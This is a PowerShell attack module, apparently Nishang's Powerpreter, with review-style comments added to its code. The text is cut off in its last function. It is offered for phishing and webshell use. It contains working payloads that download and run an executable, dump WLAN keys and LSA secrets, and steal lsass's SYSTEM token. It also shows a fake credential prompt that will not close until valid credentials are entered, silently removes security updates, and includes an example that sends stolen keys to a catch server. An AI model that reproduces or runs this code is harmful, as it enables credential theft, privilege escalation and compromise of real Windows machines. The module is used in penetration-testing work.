1<#
2.SYNOPSIS
Powerpreter is a module written in PowerShell. It makes the maximum possible functionality of Nishang available
in a single script, which is very helpful in scenarios like phishing attacks and webshells.
5
6.DESCRIPTION
Powerpreter is a script module, which makes it useful in scenarios like drive-by downloads, document attachments, webshells etc., where one
may want to pull all the functionality of Nishang into a single file or where deployment is not easy to do. Powerpreter has persistence
capabilities too. See the examples for help in using it.
10
11.EXAMPLE
12PS > Import-Module .\Powerpreter.psm1
13PS> Get-Command -Module powerpreter
14
The first command imports the module into the current PowerShell session. Ignore the Unapproved verbs warning.
The second command lists all the functions available in Powerpreter.
17
18.EXAMPLE
19PS > Import-Module .\Powerpreter.psm1; Enable-DuplicateToken; Get-LSASecret
20
Use the above command to import Powerpreter into the current PowerShell session and execute the two functions.
22
23.EXAMPLE
24PS > Import-Module .\Powerpreter.psm1; Persistence
25
Use the above for reboot persistence.
27
28.EXAMPLE
29PS > Import-Module .\Powerpreter.psm1
30PS > Get-WLAN-Keys | Do-Exfiltration -ExfilOption Webserver -URL http://192.168.254.183/catchpost.php
31
Use the above for exfiltration to a web server which logs POST requests.
33
34
35.LINK
36http://labofapenetrationtester.com/
37https://github.com/samratashok/nishang
38
39
40#>
41######################################################Download a file to the target.##################################################
42
function Download
{

<#
.SYNOPSIS
Payload to download a file into the current user's temp directory.

.DESCRIPTION
This payload downloads the file at URL and saves it as FileName inside $env:temp.
The destination is built by plain string concatenation; FileName is not validated
before it is appended to the temp path.

.PARAMETER URL
The URL from where the file would be downloaded.

.PARAMETER FileName
Name of the file where the download would be saved (relative to $env:temp).

.EXAMPLE
PS > Download http://example.com/file.txt newfile.txt

.LINK
http://labofapenetrationtester.com/
https://github.com/samratashok/nishang
#>


 [CmdletBinding()] Param(
 [Parameter(Position = 0, Mandatory = $True)]
 [String]
 $URL,
 [Parameter(Position = 1, Mandatory = $True)]
 [String]
 $FileName
 )
 # Synchronous download through System.Net.WebClient. A failed request surfaces as a
 # .NET exception; nothing is checked about the fetched content (no size or checksum).
 $webclient = New-Object System.Net.WebClient
 # Destination is always under the current user's %TEMP%.
 $file = "$env:temp\$FileName"
 $webclient.DownloadFile($URL,$file)
}
80
81#################################Download an executable in text format, convert it to exe and execute it.#################################
function Download_Execute
{

<#
.SYNOPSIS
Payload to download an executable in text format, convert it to an executable and execute it.

.DESCRIPTION
This payload downloads an executable in text format, converts it to an executable and executes it.
Use the exetotext.ps1 script to change an executable to text.
The downloaded text is expected to be space-separated byte values. The resulting
binary is always written to the fixed path $env:temp\svcmondr.exe and started from
there; the file remains on disk after launch.

.PARAMETER URL
The URL from where the file would be downloaded.

.EXAMPLE
PS > Download_Execute http://example.com/file.txt

.LINK
http://labofapenetrationtester.com/
https://github.com/samratashok/nishang
#>



 [CmdletBinding()] Param(
 [Parameter(Position = 0, Mandatory = $True)]
 [String]
 $URL
 )
 $webclient = New-Object System.Net.WebClient
 # PowerShell variable names are case-insensitive, so $webClient is the object created above.
 [string]$hexformat = $webClient.DownloadString($URL)
 # Each space-separated token is cast to a byte; a token that is not a valid byte makes the cast throw.
 [Byte[]] $temp = $hexformat -split ' '
 # Fixed file name and location in the user's %TEMP%; no integrity check on the bytes.
 [System.IO.File]::WriteAllBytes("$env:temp\svcmondr.exe", $temp)
 start-process -nonewwindow "$env:temp\svcmondr.exe"
}
117
118##########################Dumps keys in clear text for saved WLAN profiles.#########################################
function Get-Wlan-Keys
{

<#
.SYNOPSIS
Payload which dumps keys for WLAN profiles.

.DESCRIPTION
This payload dumps keys in clear text for saved WLAN profiles by parsing the
output of "netsh wlan show profiles". The payload must be run as administrator
to get the keys. The result is the raw netsh text for every profile.

.EXAMPLE
PS > Get-WLAN-Keys

.LINK
http://poshcode.org/1700
https://github.com/samratashok/nishang
#>


 [CmdletBinding()]
 Param ()
 # Keep only the "All User Profile" lines of the profile listing, as plain strings.
 $wlans = netsh wlan show profiles | Select-String -Pattern "All User Profile" | Foreach-Object {$_.ToString()}
 # Strip the label so only the profile name is left; this depends on netsh's exact
 # (locale-dependent) label text.
 $exportdata = $wlans | Foreach-Object {$_.Replace(" All User Profile : ",$null)}
 # Query each profile again with key=clear; the unparsed netsh output is returned.
 $pastevalue = $exportdata | ForEach-Object {netsh wlan show profiles name="$_" key=clear}
 $pastevalue
}
146
147
148#################################################Gathers juicy information from the target##########################################################
function Get-Information
{


<#
.SYNOPSIS
Payload which gathers juicy information from the target.

.DESCRIPTION
This payload extracts information from the registry and some commands. The information available would be dependent on the privilege with
which the script would be executed. The result is a single string with one
labelled section per source, joined with newlines.

.EXAMPLE
PS > Get-Information

.LINK
http://labofapenetrationtester.com/
https://github.com/samratashok/nishang
#>

 # Reads registry data for a key.
 #   $regkey   - registry path.
 #   $regvalue - "all" returns the data of every value, "allname" returns the value names,
 #               anything else is treated as a value name and its data is returned once.
 #   $child    - "no" reads the key itself; any other value enumerates its subkeys.
 function registry_values($regkey, $regvalue,$child)
 {
 if ($child -eq "no"){$key = get-item $regkey}
 else{$key = get-childitem $regkey}
 $key |
 ForEach-Object {
 $values = Get-ItemProperty $_.PSPath
 ForEach ($value in $_.Property)
 {
 if ($regvalue -eq "all") {$values.$value}
 elseif ($regvalue -eq "allname"){$value}
 # Named lookup: emit once and leave the inner loop.
 else {$values.$regvalue;break}
 }
 }
 }

 # Section label says "Logged in users" but the data is ProfileImagePath of every profile in ProfileList.
 $output = "Logged in users:`n" + ((registry_values "hklm:\software\microsoft\windows nt\currentversion\profilelist" "profileimagepath") -join "`r`n")
 $output = $output + "`n`n Powershell environment:`n" + ((registry_values "hklm:\software\microsoft\powershell" "allname") -join "`r`n")
 $output = $output + "`n`n Putty trusted hosts:`n" + ((registry_values "hkcu:\software\simontatham\putty" "allname") -join "`r`n")
 $output = $output + "`n`n Putty saved sessions:`n" + ((registry_values "hkcu:\software\simontatham\putty\sessions" "all") -join "`r`n")
 $output = $output + "`n`n Recently used commands:`n" + ((registry_values "hkcu:\software\microsoft\windows\currentversion\explorer\runmru" "all" "no") -join "`r`n")
 $output = $output + "`n`n Shares on the machine:`n" + ((registry_values "hklm:\SYSTEM\CurrentControlSet\services\LanmanServer\Shares" "all" "no") -join "`r`n")
 $output = $output + "`n`n Environment variables:`n" + ((registry_values "hklm:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment" "all" "no") -join "`r`n")
 $output = $output + "`n`n More details for current user:`n" + ((registry_values "hkcu:\Volatile Environment" "all" "no") -join "`r`n")
 $output = $output + "`n`n SNMP community strings:`n" + ((registry_values "hklm:\SYSTEM\CurrentControlSet\services\snmp\parameters\validcommunities" "all" "no") -join "`r`n")
 # NOTE(review): HKCU normally has no SYSTEM hive, so this lookup likely never returns data; it may have been meant as hklm: — confirm.
 $output = $output + "`n`n SNMP community strings for current user:`n" + ((registry_values "hkcu:\SYSTEM\CurrentControlSet\services\snmp\parameters\validcommunities" "all" "no") -join "`r`n")
 $output = $output + "`n`n Installed Applications:`n" + ((registry_values "hklm:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" "displayname") -join "`r`n")
 $output = $output + "`n`n Installed Applications for current user:`n" + ((registry_values "hkcu:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" "displayname") -join "`r`n")
 $output = $output + "`n`n Domain Name:`n" + ((registry_values "hklm:\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy\History\" "all" "no") -join "`r`n")
 # The remaining sections come from a file read and from external commands (net, netsh).
 $output = $output + "`n`n Contents of /etc/hosts:`n" + ((get-content -path "C:\windows\System32\drivers\etc\hosts") -join "`r`n")
 $output = $output + "`n`n Running Services:`n" + ((net start) -join "`r`n")
 $output = $output + "`n`n Account Policy:`n" + ((net accounts) -join "`r`n")
 $output = $output + "`n`n Local users:`n" + ((net user) -join "`r`n")
 $output = $output + "`n`n Local Groups:`n" + ((net localgroup) -join "`r`n")
 $output = $output + "`n`n WLAN Info:`n" + ((netsh wlan show all) -join "`r`n")

 $output

}
208
209#####################################Displays a credential prompt and doesn't go away till valid credentials are entered##################
210
function Invoke-CredentialsPhish
{
<#
.SYNOPSIS
Function which opens a user credential prompt.

.DESCRIPTION
This payload opens a prompt which asks for user credentials and
does not go away till valid credentials are entered in the prompt.
Entered credentials are validated against the local machine and, via an LDAP
bind, against the domain; the accepted user name, password and domain are
written to the output stream in plain text.


.EXAMPLE
PS > Invoke-CredentialsPhish

.LINK
http://labofapenetrationtester.blogspot.com/
https://github.com/samratashok/nishang
#>

[CmdletBinding()]
Param ()

 # Function-scoped: non-terminating errors (e.g. a failed bind below) are hidden so the loop simply re-prompts.
 $ErrorActionPreference="SilentlyContinue"
 Add-Type -assemblyname system.DirectoryServices.accountmanagement
 # Validation context for local (machine) accounts.
 $DS = New-Object System.DirectoryServices.AccountManagement.PrincipalContext([System.DirectoryServices.AccountManagement.ContextType]::Machine)
 # LDAP path of the current domain, from the default ADSI binding.
 $domainDN = "LDAP://" + ([ADSI]"").distinguishedName
 # No exit condition other than a successful validation: Cancel yields $null and re-prompts.
 while($true)
 {
 $credential = $host.ui.PromptForCredential("Credentials are required to perform this operation", "Please enter your user name and password.", "", "")
 if($credential)
 {
 $creds = $credential.GetNetworkCredential()
 [String]$user = $creds.username
 [String]$pass = $creds.password
 [String]$domain = $creds.domain
 $authlocal = $DS.ValidateCredentials($user, $pass)
 # Domain check: a bind whose .name resolves counts as valid.
 $authdomain = New-Object System.DirectoryServices.DirectoryEntry($domainDN,$user,$pass)
 if(($authlocal -eq $true) -or ($authdomain.name -ne $null))
 {
 # "Domain:" appears twice on purpose in the original: the credential's domain field, then the bound directory name.
 $output = "Username: " + $user + " Password: " + $pass + " Domain:" + $domain + " Domain:"+ $authdomain.name
 $output
 break
 }
 }
 }
}
257
258
259
260
261
262####################################Silently removes updates for a target machine.########################################################
263###Thanks Trevor Sullivan
264###http://trevorsullivan.net/2011/05/31/powershell-removing-software-updates-from-windows/
function Remove-Update {

<#
.SYNOPSIS
Payload which silently removes updates for a target machine.

.DESCRIPTION
This payload removes updates from a target machine. This could be
used to remove all updates, all security updates or a particular update.
Removal is done by running wusa.exe /uninstall per hotfix; KBID is matched
against Get-HotFix output, and "All"/"Security" are regex substring matches
(case-insensitive), not exact keywords.

.PARAMETER KBID
The KBID of the update you want to remove. All and Security are also valid.

.EXAMPLE
PS > Remove-Update All
This removes all updates from the target.

.EXAMPLE
PS > Remove-Update Security
This removes all security updates from the target.

.EXAMPLE
PS > Remove-Update KB2761226
This removes KB2761226 from the target.

.LINK
http://trevorsullivan.net/2011/05/31/powershell-removing-software-updates-from-windows/
https://github.com/samratashok/nishang
#>


 [CmdletBinding()] Param(
 [Parameter(Position = 0, Mandatory = $True)]
 [String]
 $KBID
 )
 $HotFixes = Get-HotFix

 foreach ($HotFix in $HotFixes)
 {

 # Exact match on a single hotfix: uninstall it and stop. Note the parameter is
 # overwritten with the bare number and the break skips the wait loop below.
 if ($KBID -eq $HotFix.HotfixId)
 {
 $KBID = $HotFix.HotfixId.Replace("KB", "")
 # The command string is built from Get-HotFix data, not from caller input.
 $RemovalCommand = "wusa.exe /uninstall /kb:$KBID /quiet /norestart"
 Write-Host "Removing $KBID from the target."
 Invoke-Expression $RemovalCommand
 break
 }

 # -match is a regex test, so any KBID containing "all" (any case) enters this branch.
 if ($KBID -match "All")
 {
 $KBNumber = $HotFix.HotfixId.Replace("KB", "")
 $RemovalCommand = "wusa.exe /uninstall /kb:$KBNumber /quiet /norestart"
 Write-Host "Removing update $KBNumber from the target."
 Invoke-Expression $RemovalCommand

 }

 # Same regex semantics; additionally filters on the hotfix Description.
 if ($KBID -match "Security")
 {
 if ($HotFix.Description -match "Security")
 {

 $KBSecurity = $HotFix.HotfixId.Replace("KB", "")
 $RemovalCommand = "wusa.exe /uninstall /kb:$KBSecurity /quiet /norestart"
 Write-Host "Removing Security Update $KBSecurity from the target."
 Invoke-Expression $RemovalCommand
 }
 }


 # Runs on every iteration (even when nothing was launched) and waits for any wusa process to exit.
 while (@(Get-Process wusa -ErrorAction SilentlyContinue).Count -ne 0)
 {
 Start-Sleep 3
 Write-Output "Waiting for update removal to finish ..."
 }
 }

}
345
346
347##########################Duplicates the Access token of lsass (SYSTEM) and sets it in the current process thread.###################################
348####Thanks Niklas Goude#####
349####http://blogs.technet.com/b/heyscriptingguy/archive/2012/07/05/use-powershell-to-duplicate-process-tokens-via-p-invoke.aspx
function Enable-DuplicateToken {

<#
.SYNOPSIS
Payload which duplicates the Access token of lsass and sets it in the current process thread.

.DESCRIPTION
This payload duplicates the Access token of lsass and sets it in the current process thread.
The payload must be run with elevated permissions. It first enables SeDebugPrivilege
on the current process token, then opens the lsass process token, duplicates it and
assigns the duplicate to the calling thread via P/Invoke (advapi32/kernel32).

.EXAMPLE
PS > Enable-DuplicateToken

.LINK
http://www.truesec.com
http://blogs.technet.com/b/heyscriptingguy/archive/2012/07/05/use-powershell-to-duplicate-process-tokens-via-p-invoke.aspx
https://github.com/samratashok/nishang

.NOTES
Goude 2012, TrueSec
#>


[CmdletBinding()]
param()

# C# P/Invoke definitions compiled below with Add-Type (string literal; not edited).
$signature = @"
 [StructLayout(LayoutKind.Sequential, Pack = 1)]
 public struct TokPriv1Luid
 {
 public int Count;
 public long Luid;
 public int Attr;
 }

 public const int SE_PRIVILEGE_ENABLED = 0x00000002;
 public const int TOKEN_QUERY = 0x00000008;
 public const int TOKEN_ADJUST_PRIVILEGES = 0x00000020;
 public const UInt32 STANDARD_RIGHTS_REQUIRED = 0x000F0000;

 public const UInt32 STANDARD_RIGHTS_READ = 0x00020000;
 public const UInt32 TOKEN_ASSIGN_PRIMARY = 0x0001;
 public const UInt32 TOKEN_DUPLICATE = 0x0002;
 public const UInt32 TOKEN_IMPERSONATE = 0x0004;
 public const UInt32 TOKEN_QUERY_SOURCE = 0x0010;
 public const UInt32 TOKEN_ADJUST_GROUPS = 0x0040;
 public const UInt32 TOKEN_ADJUST_DEFAULT = 0x0080;
 public const UInt32 TOKEN_ADJUST_SESSIONID = 0x0100;
 public const UInt32 TOKEN_READ = (STANDARD_RIGHTS_READ | TOKEN_QUERY);
 public const UInt32 TOKEN_ALL_ACCESS = (STANDARD_RIGHTS_REQUIRED | TOKEN_ASSIGN_PRIMARY |
 TOKEN_DUPLICATE | TOKEN_IMPERSONATE | TOKEN_QUERY | TOKEN_QUERY_SOURCE |
 TOKEN_ADJUST_PRIVILEGES | TOKEN_ADJUST_GROUPS | TOKEN_ADJUST_DEFAULT |
 TOKEN_ADJUST_SESSIONID);

 public const string SE_TIME_ZONE_NAMETEXT = "SeTimeZonePrivilege";
 public const int ANYSIZE_ARRAY = 1;

 [StructLayout(LayoutKind.Sequential)]
 public struct LUID
 {
 public UInt32 LowPart;
 public UInt32 HighPart;
 }

 [StructLayout(LayoutKind.Sequential)]
 public struct LUID_AND_ATTRIBUTES {
 public LUID Luid;
 public UInt32 Attributes;
 }


 public struct TOKEN_PRIVILEGES {
 public UInt32 PrivilegeCount;
 [MarshalAs(UnmanagedType.ByValArray, SizeConst=ANYSIZE_ARRAY)]
 public LUID_AND_ATTRIBUTES [] Privileges;
 }

 [DllImport("advapi32.dll", SetLastError=true)]
 public extern static bool DuplicateToken(IntPtr ExistingTokenHandle, int
 SECURITY_IMPERSONATION_LEVEL, out IntPtr DuplicateTokenHandle);


 [DllImport("advapi32.dll", SetLastError=true)]
 [return: MarshalAs(UnmanagedType.Bool)]
 public static extern bool SetThreadToken(
 IntPtr PHThread,
 IntPtr Token
 );

 [DllImport("advapi32.dll", SetLastError=true)]
 [return: MarshalAs(UnmanagedType.Bool)]
 public static extern bool OpenProcessToken(IntPtr ProcessHandle,
 UInt32 DesiredAccess, out IntPtr TokenHandle);

 [DllImport("advapi32.dll", SetLastError = true)]
 public static extern bool LookupPrivilegeValue(string host, string name, ref long pluid);

 [DllImport("kernel32.dll", ExactSpelling = true)]
 public static extern IntPtr GetCurrentProcess();

 [DllImport("advapi32.dll", ExactSpelling = true, SetLastError = true)]
 public static extern bool AdjustTokenPrivileges(IntPtr htok, bool disall,
 ref TokPriv1Luid newst, int len, IntPtr prev, IntPtr relen);
"@

 # Elevation check. Break outside a loop ends the enclosing pipeline rather than just this function.
 $currentPrincipal = New-Object Security.Principal.WindowsPrincipal( [Security.Principal.WindowsIdentity]::GetCurrent())
 if($currentPrincipal.IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator) -ne $true) {
 Write-Warning "Run the Command as an Administrator"
 Break
 }

 # Add-Type fails if the type already exists in the session (re-running in the same process).
 Add-Type -MemberDefinition $signature -Name AdjPriv -Namespace AdjPriv
 $adjPriv = [AdjPriv.AdjPriv]
 [long]$luid = 0

 # One-entry privilege structure: Count=1, Luid filled in by LookupPrivilegeValue, Attr=enabled.
 $tokPriv1Luid = New-Object AdjPriv.AdjPriv+TokPriv1Luid
 $tokPriv1Luid.Count = 1
 $tokPriv1Luid.Luid = $luid
 $tokPriv1Luid.Attr = [AdjPriv.AdjPriv]::SE_PRIVILEGE_ENABLED

 # Return value is assigned but never checked.
 $retVal = $adjPriv::LookupPrivilegeValue($null, "SeDebugPrivilege", [ref]$tokPriv1Luid.Luid)

 [IntPtr]$htoken = [IntPtr]::Zero
 # Return value is assigned but never checked; a failure here makes $htoken Zero for the next call.
 $retVal = $adjPriv::OpenProcessToken($adjPriv::GetCurrentProcess(), [AdjPriv.AdjPriv]::TOKEN_ALL_ACCESS, [ref]$htoken)


 # $tokenPrivileges is created but never used.
 $tokenPrivileges = New-Object AdjPriv.AdjPriv+TOKEN_PRIVILEGES
 # prev is Zero, so the 12 passed as the previous-state buffer length has no effect (per AdjustTokenPrivileges semantics — confirm).
 $retVal = $adjPriv::AdjustTokenPrivileges($htoken, $false, [ref]$tokPriv1Luid, 12, [IntPtr]::Zero, [IntPtr]::Zero)

 if(-not($retVal)) {
 [System.Runtime.InteropServices.marshal]::GetLastWin32Error()
 Break
 }

 # Opening lsass's handle requires the SeDebugPrivilege enabled above.
 $process = (Get-Process -Name lsass)
 [IntPtr]$hlsasstoken = [IntPtr]::Zero
 $retVal = $adjPriv::OpenProcessToken($process.Handle, ([AdjPriv.AdjPriv]::TOKEN_IMPERSONATE -BOR [AdjPriv.AdjPriv]::TOKEN_DUPLICATE), [ref]$hlsasstoken)

 # 2 is passed as the SECURITY_IMPERSONATION_LEVEL argument (SecurityImpersonation in the Win32 enum).
 [IntPtr]$dulicateTokenHandle = [IntPtr]::Zero
 $retVal = $adjPriv::DuplicateToken($hlsasstoken, 2, [ref]$dulicateTokenHandle)

 # Zero thread handle = the calling thread. Only this last call's result is error-checked.
 $retval = $adjPriv::SetThreadToken([IntPtr]::Zero, $dulicateTokenHandle)
 if(-not($retVal)) {
 [System.Runtime.InteropServices.marshal]::GetLastWin32Error()
 }
}
496
497######################################################Dumps LSA Secrets from the target#############################################
498####Thanks Niklas Goude#####
499####http://blogs.technet.com/b/heyscriptingguy/archive/2012/07/06/use-powershell-to-decrypt-lsa-secrets-from-the-registry.aspx
function Get-LsaSecret {

<#
.SYNOPSIS
Payload which extracts LSA Secrets from local computer.

.DESCRIPTION
Extracts LSA secrets from HKLM:\\SECURITY\Policy\Secrets\ on a local computer.
The payload must be run with elevated permissions, in 32-bit mode and requires
permissions to the security key in HKLM. The permission could be obtained by using
the Enable-DuplicateToken payload.
For each secret, the five value subkeys are copied into a temporary key named
MySecret, LsaRetrievePrivateData is called for that name, and the temporary key
is removed at the end. One object (Name, Account, Secret, ComputerName) is emitted per secret.

.PARAMETER RegistryKey
Name of Key to Extract. If the parameter is not used, all secrets will be displayed.

.EXAMPLE
PS > Get-LsaSecret

.EXAMPLE
PS > Get-LsaSecret -RegistryKey KeyName
Read contents of the key mentioned as parameter.

.LINK
http://www.truesec.com
http://blogs.technet.com/b/heyscriptingguy/archive/2012/07/06/use-powershell-to-decrypt-lsa-secrets-from-the-registry.aspx
https://github.com/samratashok/nishang

.NOTES
Goude 2012, TrueSec
#>

 [CmdletBinding()] Param (
 [Parameter(Position = 0, Mandatory=$False)]
 [String]
 $RegistryKey
 )

 Begin {
 # Check if User is Elevated. Break outside a loop ends the enclosing pipeline, not just this function.
 $currentPrincipal = New-Object Security.Principal.WindowsPrincipal( [Security.Principal.WindowsIdentity]::GetCurrent())
 if($currentPrincipal.IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator) -ne $true) {
 Write-Warning "Run the Command as an Administrator"
 Break
 }

 # Check if Script is run in a 32-bit Environment by checking a Pointer Size
 if([System.IntPtr]::Size -eq 8) {
 Write-Warning "Run PowerShell in 32-bit mode"
 Break
 }



 # Check if RegKey is specified; otherwise enumerate every secret's leaf name under Secrets.
 # ($registryKey and $RegistryKey are the same variable.)
 if([string]::IsNullOrEmpty($registryKey)) {
 [string[]]$registryKey = (Split-Path (Get-ChildItem HKLM:\SECURITY\Policy\Secrets | Select -ExpandProperty Name) -Leaf)
 }

 # Create Temporary Registry Key (a fixed, predictable name under SECURITY\Policy\Secrets)
 if( -not(Test-Path "HKLM:\\SECURITY\Policy\Secrets\MySecret")) {
 mkdir "HKLM:\\SECURITY\Policy\Secrets\MySecret" | Out-Null
 }

 # C# P/Invoke definitions for the LSA policy API (string literal; not edited).
 $signature = @"
 [StructLayout(LayoutKind.Sequential)]
 public struct LSA_UNICODE_STRING
 {
 public UInt16 Length;
 public UInt16 MaximumLength;
 public IntPtr Buffer;
 }

 [StructLayout(LayoutKind.Sequential)]
 public struct LSA_OBJECT_ATTRIBUTES
 {
 public int Length;
 public IntPtr RootDirectory;
 public LSA_UNICODE_STRING ObjectName;
 public uint Attributes;
 public IntPtr SecurityDescriptor;
 public IntPtr SecurityQualityOfService;
 }

 public enum LSA_AccessPolicy : long
 {
 POLICY_VIEW_LOCAL_INFORMATION = 0x00000001L,
 POLICY_VIEW_AUDIT_INFORMATION = 0x00000002L,
 POLICY_GET_PRIVATE_INFORMATION = 0x00000004L,
 POLICY_TRUST_ADMIN = 0x00000008L,
 POLICY_CREATE_ACCOUNT = 0x00000010L,
 POLICY_CREATE_SECRET = 0x00000020L,
 POLICY_CREATE_PRIVILEGE = 0x00000040L,
 POLICY_SET_DEFAULT_QUOTA_LIMITS = 0x00000080L,
 POLICY_SET_AUDIT_REQUIREMENTS = 0x00000100L,
 POLICY_AUDIT_LOG_ADMIN = 0x00000200L,
 POLICY_SERVER_ADMIN = 0x00000400L,
 POLICY_LOOKUP_NAMES = 0x00000800L,
 POLICY_NOTIFICATION = 0x00001000L
 }

 [DllImport("advapi32.dll", SetLastError = true, PreserveSig = true)]
 public static extern uint LsaRetrievePrivateData(
 IntPtr PolicyHandle,
 ref LSA_UNICODE_STRING KeyName,
 out IntPtr PrivateData
 );

 [DllImport("advapi32.dll", SetLastError = true, PreserveSig = true)]
 public static extern uint LsaStorePrivateData(
 IntPtr policyHandle,
 ref LSA_UNICODE_STRING KeyName,
 ref LSA_UNICODE_STRING PrivateData
 );

 [DllImport("advapi32.dll", SetLastError = true, PreserveSig = true)]
 public static extern uint LsaOpenPolicy(
 ref LSA_UNICODE_STRING SystemName,
 ref LSA_OBJECT_ATTRIBUTES ObjectAttributes,
 uint DesiredAccess,
 out IntPtr PolicyHandle
 );

 [DllImport("advapi32.dll", SetLastError = true, PreserveSig = true)]
 public static extern uint LsaNtStatusToWinError(
 uint status
 );

 [DllImport("advapi32.dll", SetLastError = true, PreserveSig = true)]
 public static extern uint LsaClose(
 IntPtr policyHandle
 );

 [DllImport("advapi32.dll", SetLastError = true, PreserveSig = true)]
 public static extern uint LsaFreeMemory(
 IntPtr buffer
 );
"@

 # Fails if the type already exists in this session (re-running in the same process).
 Add-Type -MemberDefinition $signature -Name LSAUtil -Namespace LSAUtil
 }

 Process{
 foreach($key in $RegistryKey) {
 $regPath = "HKLM:\\SECURITY\Policy\Secrets\" + $key
 $tempRegPath = "HKLM:\\SECURITY\Policy\Secrets\MySecret"
 $myKey = "MySecret"
 if(Test-Path $regPath) {
 # Probe read access; the SECURITY hive is not readable by administrators by default.
 Try {
 Get-ChildItem $regPath -ErrorAction Stop | Out-Null
 }
 Catch {
 Write-Error -Message "Access to registry Denied, run as NT AUTHORITY\SYSTEM" -Category PermissionDenied
 Break
 }

 if(Test-Path $regPath) {
 # Copy Key: mirror the five value subkeys of the secret into the temporary key.
 "CurrVal","OldVal","OupdTime","CupdTime","SecDesc" | ForEach-Object {
 $copyFrom = "HKLM:\SECURITY\Policy\Secrets\" + $key + "\" + $_
 $copyTo = "HKLM:\SECURITY\Policy\Secrets\MySecret\" + $_

 if( -not(Test-Path $copyTo) ) {
 mkdir $copyTo | Out-Null
 }
 $item = Get-ItemProperty $copyFrom
 Set-ItemProperty -Path $copyTo -Name '(default)' -Value $item.'(default)'
 }
 }
 # Attributes (all zero / null: no root directory, no security descriptor)
 $objectAttributes = New-Object LSAUtil.LSAUtil+LSA_OBJECT_ATTRIBUTES
 $objectAttributes.Length = 0
 $objectAttributes.RootDirectory = [IntPtr]::Zero
 $objectAttributes.Attributes = 0
 $objectAttributes.SecurityDescriptor = [IntPtr]::Zero
 $objectAttributes.SecurityQualityOfService = [IntPtr]::Zero

 # localSystem: an empty system name means the local machine.
 $localsystem = New-Object LSAUtil.LSAUtil+LSA_UNICODE_STRING
 $localsystem.Buffer = [IntPtr]::Zero
 $localsystem.Length = 0
 $localsystem.MaximumLength = 0

 # Secret Name: LSA_UNICODE_STRING lengths are in bytes (chars * CharSize).
 # The unmanaged buffer from StringToHGlobalUni is never released with FreeHGlobal.
 $secretName = New-Object LSAUtil.LSAUtil+LSA_UNICODE_STRING
 $secretName.Buffer = [System.Runtime.InteropServices.Marshal]::StringToHGlobalUni($myKey)
 $secretName.Length = [Uint16]($myKey.Length * [System.Text.UnicodeEncoding]::CharSize)
 $secretName.MaximumLength = [Uint16](($myKey.Length + 1) * [System.Text.UnicodeEncoding]::CharSize)

 # Get LSA PolicyHandle (method name case differs from the declaration; PowerShell resolves it case-insensitively)
 $lsaPolicyHandle = [IntPtr]::Zero
 [LSAUtil.LSAUtil+LSA_AccessPolicy]$access = [LSAUtil.LSAUtil+LSA_AccessPolicy]::POLICY_GET_PRIVATE_INFORMATION
 $lsaOpenPolicyHandle = [LSAUtil.LSAUtil]::LSAOpenPolicy([ref]$localSystem, [ref]$objectAttributes, $access, [ref]$lsaPolicyHandle)

 if($lsaOpenPolicyHandle -ne 0) {
 Write-Warning "lsaOpenPolicyHandle Windows Error Code: $lsaOpenPolicyHandle"
 Continue
 }

 # Retrieve Private Data for the temporary key name, then close the policy handle.
 # $privateData is never released with LsaFreeMemory (declared above but unused).
 $privateData = [IntPtr]::Zero
 $ntsResult = [LSAUtil.LSAUtil]::LsaRetrievePrivateData($lsaPolicyHandle, [ref]$secretName, [ref]$privateData)

 $lsaClose = [LSAUtil.LSAUtil]::LsaClose($lsaPolicyHandle)

 $lsaNtStatusToWinError = [LSAUtil.LSAUtil]::LsaNtStatusToWinError($ntsResult)

 # Only warns; processing continues with whatever $privateData holds.
 if($lsaNtStatusToWinError -ne 0) {
 Write-Warning "lsaNtsStatusToWinError: $lsaNtStatusToWinError"
 }

 [LSAUtil.LSAUtil+LSA_UNICODE_STRING]$lusSecretData =
 [LSAUtil.LSAUtil+LSA_UNICODE_STRING][System.Runtime.InteropServices.marshal]::PtrToStructure($privateData, [System.Type][LSAUtil.LSAUtil+LSA_UNICODE_STRING])

 # Length is in bytes, so /2 gives the character count; any marshalling error yields an empty secret.
 Try {
 [string]$value = [System.Runtime.InteropServices.marshal]::PtrToStringAuto($lusSecretData.Buffer)
 $value = $value.SubString(0, ($lusSecretData.Length / 2))
 }
 Catch {
 $value = ""
 }

 if($key -match "^_SC_") {
 # Get Service Account: _SC_<name> secrets belong to a service; look up its logon account.
 $serviceName = $key -Replace "^_SC_"
 Try {
 # WQL is built by string interpolation from the registry key name.
 $service = Get-WmiObject -Query "SELECT StartName FROM Win32_Service WHERE Name = '$serviceName'" -ErrorAction Stop
 $account = $service.StartName
 }
 Catch {
 $account = ""
 }
 } else {
 $account = ""
 }

 # Return Object
 $obj = New-Object PSObject -Property @{
 Name = $key;
 Secret = $value;
 Account = $Account
 }

 $pastevalue = $obj | Select-Object Name, Account, Secret, @{Name="ComputerName";Expression={$env:COMPUTERNAME}}
 $pastevalue

 } else {
 Write-Error -Message "Path not found: $regPath" -Category ObjectNotFound
 }
 }
 }
 end {
 # $tempRegPath is only assigned inside the Process loop; with no keys it is undefined here — confirm.
 if(Test-Path $tempRegPath) {
 Remove-Item -Path "HKLM:\\SECURITY\Policy\Secrets\MySecret" -Recurse -Force
 }
 # NOTE(review): $exfil, $username, $password, $dev_key and $keyoutoption are not defined in this
 # function; presumably they come from the caller's scope. $pastevalue holds only the last secret.
 if($exfil -eq $True)
 {
 Do-Exfiltration "LSA Secrets: " "$pastevalue" "$username" "$password" "$dev_key" "$keyoutoption"
 }
 }

 }
762
763######################################################Converts Base64 string or file to plain.##################################################
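function Base64ToString
{

<#
.SYNOPSIS
Helper function which decodes a base64 string to readable text.

.DESCRIPTION
This payload decodes a base64 string, or the base64 contents of a file, to
readable text. The decoded bytes are interpreted as UTF-16LE
(System.Text.Encoding.Unicode), the encoding PowerShell uses for -EncodedCommand.
A file whose base64 content is wrapped over several lines is decoded as a whole.

.PARAMETER Base64Strfile
The filename which contains the base64 string to be decoded.
Use the parameter -IsString while using a string instead of a file.

.PARAMETER IsString
Treat Base64Strfile as the base64 string itself rather than as a file name.

.EXAMPLE
PS > Base64ToString base64.txt

.EXAMPLE
PS > Base64ToString dGVzdGVzdA== -IsString

.LINK
http://labofapenetrationtester.com/
https://github.com/samratashok/nishang
#>

 [CmdletBinding()] Param(
 [Parameter(Position = 0, Mandatory = $True)]
 [String]
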